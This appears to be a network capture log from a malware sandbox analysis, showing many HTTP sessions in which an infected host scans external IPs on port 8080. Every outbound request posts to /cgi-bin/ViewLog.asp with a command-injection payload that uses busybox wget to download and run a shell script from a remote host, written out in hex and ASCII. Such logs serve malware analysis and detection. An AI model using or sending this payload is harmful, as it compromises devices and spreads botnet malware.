                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:43.588434935 CEST1289INHTTP/1.1 200 OK
                                                        ETag: "1656284168000"
                                                        Content-Type: text/html
                                                        Content-Length: 1215
                                                        Server: Jetty(9.4.46.v20220331)
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 2a 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 64 61 74 61 3a 20 67 61 70 3a 20 63 6f 6e 74 65 6e 74 3a 20 62 6c 6f 62 3a 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 73 65 6c 66 27 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 6d 69 6e 69 6d 61 6c 2d 75 69 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 65 36 34 61 31 39 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 3e 3c 74 69 74 6c 65 3e 6f 70 65 6e 48 41 42 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 2d 74 72 61 6e 73 6c 75 63 65 6e 74 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 72 65 73 2f 69 63 6f 6e 73 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 72 65 73 2f 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2e 73 76 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 72 65 73 2f 69 63 6f 6e 73 2f 31 32 38 78 31 32 38 2e 70 6e 67 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 32 38 78 31 32 38 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 6d 61 6e 69 66 65 73 74 22 20 68 72 65 66 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 6f 6e 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 75 73 65 2d 63 72 65 64 65 6e 74 69 61 6c 73 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 61 70 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d
                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="Content-Security-Policy" content="default-src * 'self' 'unsafe-inline' 'unsafe-eval' data: gap: content: blob:; style-src 'self' 'unsafe-inline';"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,minimal-ui,viewport-fit=cover"><meta name="theme-color" content="#e64a19"><meta name="format-detection" content="telephone=no"><meta name="msapplication-tap-highlight" content="no"><title>openHAB</title><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black-translucent"><link rel="apple-touch-icon" href="/res/icons/apple-touch-icon.png" type="image/png" sizes="180x180" crossorigin="use-credentials"><link rel="icon" href="/res/icons/favicon.svg" type="image/svg+xml" sizes="any" crossorigin="use-credentials"><link rel="icon" href="/res/icons/128x128.png" type="image/png" sizes="128x128" crossorigin="use-credentials"><link rel="manifest" href="/manifest.json" crossorigin="use-credentials"><link href="/css/app.css" rel="stylesheet"></head><body><div id=


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.236077262.195.203.2428080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.304475069 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:43.640649080 CEST626INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Sun, 14 Apr 2024 14:36:43 GMT
                                                        Keep-Alive: timeout=5
                                                        Connection: keep-alive
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.235485294.121.102.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.306731939 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.233489631.200.72.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.307683945 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.234822294.121.186.2298080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.311956882 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        684192.168.2.234513495.86.105.628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.312244892 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        685192.168.2.234425295.86.81.268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.312443972 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        686192.168.2.235912294.210.43.1558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.319510937 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        687192.168.2.234398895.75.70.978080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.335119963 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        688192.168.2.235156631.136.185.1438080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.587789059 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.567137003 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:46.487034082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:50.358325958 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:58.037246943 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:13.395215988 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:44.878793001 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        689192.168.2.235924894.121.207.628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.649943113 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        690192.168.2.235534494.121.108.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.650019884 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.235806294.242.54.2288080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:43.650065899 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:44.680144072 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:45.017545938 CEST596INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:44 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
